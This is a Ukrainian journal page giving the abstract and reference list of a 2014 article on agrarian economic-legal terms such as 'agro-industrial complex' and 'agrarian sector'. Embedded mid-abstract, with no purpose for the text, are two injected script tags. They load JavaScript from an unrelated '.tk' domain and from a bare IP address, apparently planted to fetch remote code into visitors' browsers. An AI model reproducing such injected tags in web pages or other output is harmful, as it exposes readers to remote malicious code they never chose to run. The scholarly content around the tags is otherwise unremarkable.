ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330(083.71):349.42
Проблеми економічної теорії

Про зміст та співвідношення деяких аграрних дефініцій / Курило В. І. // Економіка АПК. - 2014. - № 2 - С. 87

Проаналізовано деякі базові для аграрної науки економіко-правові дефініції, зокрема категорії «агропромисловий комплекс», «сільське господарство», «аграрний сектор економіки», «аграрна сфера». Відзначено, що наприкінці 80-х - початку 90-х років минулого століття народне господарство країни умовно поділялося на «комплекси»: паливно-енергетичний, промисловий, агропромисловий, будівельний, транспортний, оборонний. Такий підхід залишився у спадок незалежній Україні, мав місце на початку її становлення та трапляється досить часто й нині. Разом із тим серед учених немає однозначного розуміння, а тому і тлумачення базового аграрного понятійного апарату. На підставі дослідження наукових поглядів учених-економістів та правознавців зроблені висновки про зміст і співвідношення базових аграрних економіко-правових дефініцій. Бібліогр.: 22.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: агропромисловий комплекс, сільське, лісове, рибне, водне господарство, аграрний сектор економіки, аграрна сфера

Список використаних джерел

 1. Экономический словарь агропромышленного комплекса / Сост. А.В. Крисальный; под ред. чл.–корр. ВАСХНИЛ, д.э.н. А.А. Сторожука. – К.: Урожай, 1986. – 336 с.
 2. Довідник з управління сільськогосподарським виробництвом в умовах АПК / [Л.Д. Залєвський, Й.С. Завадський, М.О. Кононов та ін.]; за ред. Л.Д. Залєвського. – 2–ге вид., переробл. і доповн. – К.: Урожай, 1987. – 240 с.
 3. Мостовий Г.І. Щодо визначення механізмів державного управління агропромисловим комплексом регіону / Г.І. Мостовий // Актуальні проблеми державного управління: зб. наук. пр – Х., 1998. – Вип. 2. – С. 75–90.
 4. Агропромисловий комплекс: правові питання / [В.І. Семчик, П.Ф. Кулинич, О.О. Погрібний, В.О. Олійник]; за ред. Ю.С. Шемшученка. – К.: Урожай, 1992. – 192 с.
 5. Юридичний словник–довідник / Кол. авт.; за ред. Ю.С. Шемшученка. – К.: Феміна, 1996. – 696 с.
 6. Словник аграрно-правових термінів і понять: навч. вид. / уклад. О.М. Браніцький, С.І. Марченко, В.В. Шуляк. – К.: НАУ, 2002. – 72 с.
 7. Адміністративне право України [підруч. для юрид. вузів і фак. / Ю.П. Битяк, В.В. Богуцький, В.М. Гаращук та ін.]; за ред. Ю.П. Битяка. – Х.: Право, 2001. – 528 с.
 8. Володін С.А. Інноваційний розвиток аграрної науки: моногр. / С.А. Володін. – К.: МАУП, 2006. – 400 с.
 9. Про внесення змін до класифікації доходів і видатків Державного та місцевих бюджетів України: наказ Міністерства фінансів України від 20 трав. 1993 р. № 28. – К.: Електронна правова система «Право». Версія ПРОФ. Берез. 2013.
 10. Про склад агропромислового комплексу: Лист Міністерства сільського господарства і продовольства України від 23.02.1995 р. № 37–21–1–11/1162 // Архів Міністерства аграрної політики України, 2006.
 11. Концепція Національної програми відродження села на 1995–2005 роки: затверджена Постановою ВР України від 4 лют. 1994 р., № 3924. – К.: Електронна правова система «Право». Версія ПРОФ. Берез. 2013.
 12. Мостовий Г.І. Щодо визначення механізмів державного управління агропромисловим комплексом регіону / Г.І. Мостовий // Актуальні проблеми державного управління: зб. наук. пр – Х., 1998. – Вип. 2. – С. 75–90.
 13. Гриценко С.П. Латинська мова й основи римського права: навч. посіб. / С.П. Гриценко. – К.: Центр навчальної літератури, 2005. – 336 с.
 14. Современная украинская энциклопедия. Т. 13. – Харьков: Книжный клуб „Клуб семейного досуга”, 2005. – 1294 с.
 15. Майовець Є.Й. Теорія аграрних відносин: навч. посіб. / Є.Й. Майовець. – К.: Центр навчальної літератури, 2005. – 276 с.
 16. Аграрне право України: підруч. / [З.П. Білошкурська, С.І. Бурлака, О.М. Браніцький, І.В. Гиренко, О.П. Світличний]; за заг. ред. В.І. Курила. – Умань: Видавничо-поліграфічний центр «Візаві» (видавець «Сочінський»), 2011. – 494 с.
 17. Аграрне право: підруч. для студ. вищ. навч. закл. / [В.П.Жушман, В.М.Корнієнко, Г.С.Корнієнко та ін.]; за ред. В.П. Жушмана та А.М. Статівки. – Х.: Право, 2010. – 296 с.
 18. Аграрне право України: підруч. / [В.М.Єрмоленко, О.В.Гафурова, М.В. Гребенюк та ін.]; за заг. ред. В.М. Єрмоленка. – К: Інтерком Інтер, 2010. – 608 с.
 19. Agribusiness law: Market, Regulation, Taxation and environment // Coord. R. Buranello, A.R. Passos de Souza,E. Perin Junior. Editor-in-Chief V.Vieira. Translated by C. Rostworowski da Costa. – Quartier Latin, Sao Paulo, 2010. – 1106 p.
 20. Mandelker D. R. Environmental and land controls legislation / D. R. Mandelker. – N.Y., 1976.
 21. Coughlin K., Keene I. National agricultural lands study: The protection of farmland / К. Coughlin , І. Keene / A reference guidebook for state and local governments. – Wash (DC), 1981. – P. 96.
 22. Seetharaman Koushik. Genetic Engineering and agronomic crops: What are the issues [Електронний ресурс] / Koushik Seetharaman // Departament of food science, The Pennsylvania State University USA. – Режим доступу : http://biotech.cas.psu.edu/article/gmo_crops_1.htm.
Читати статтю: 14_02_87-92.pdf